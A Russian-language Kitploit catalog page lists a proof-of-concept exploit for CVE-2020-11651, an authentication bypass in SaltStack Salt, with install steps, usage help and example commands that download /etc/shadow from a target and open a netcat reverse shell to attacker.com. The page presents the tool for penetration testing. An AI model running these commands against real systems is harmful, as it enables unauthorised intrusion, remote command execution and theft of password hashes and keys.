Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-11651 — CVE-2020-11651: Доказательство концепции | Kitploit
Инструменты/GitHubGitHub/0xc0d/cve-2020-11651
Анализ уязвимостейЭксплуатацияЭксфильтрация данныхТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHub0xc0d/cve-2020-11651

CVE-2020-11651

CVE-2020-11651: Доказательство концепции

Репозиторий
401425 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-11651

Проблема была обнаружена в SaltStack Salt до версий 2019.2.4 и 3000 до 3000.2. Класс ClearFuncs процесса salt-master не выполняет надлежащую проверку вызовов методов. Это позволяет удаленному пользователю получать доступ к некоторым методам без аутентификации. Эти методы могут использоваться для получения токенов пользователей с мастера Salt и/или выполнения произвольных команд на миньонах Salt.

Подробности

Патчи для неподдерживаемых версий Salt

Установка

root@kitploit:~
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py

Использование

root@kitploit:~
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]

CVE-2020-11651 PoC

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -t HOST
  --port PORT, -p PORT
  --execute COMMAND, -e COMMAND
                        Command to execute. Defaul: /bin/sh (use netcat for reverse shell)
  --upload src dest, -u src dest
                        Upload a file
  --download src dest, -d src dest
                        Download a file
  --minions             Send command to all minions on master
  --quiet, -q           Enable quiet/silent mode
  --fetch-key-only      Only fetch the key

Пример

Загрузка файла shadow

root@kitploit:~
./PoC.py --host target.com --download /etc/shadow ./shadow

Запуск обратного шелла

root@kitploit:~
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""

Получение ключа

root@kitploit:~
./PoC.py --host target.com --fetch-key-only
Скачать инструмент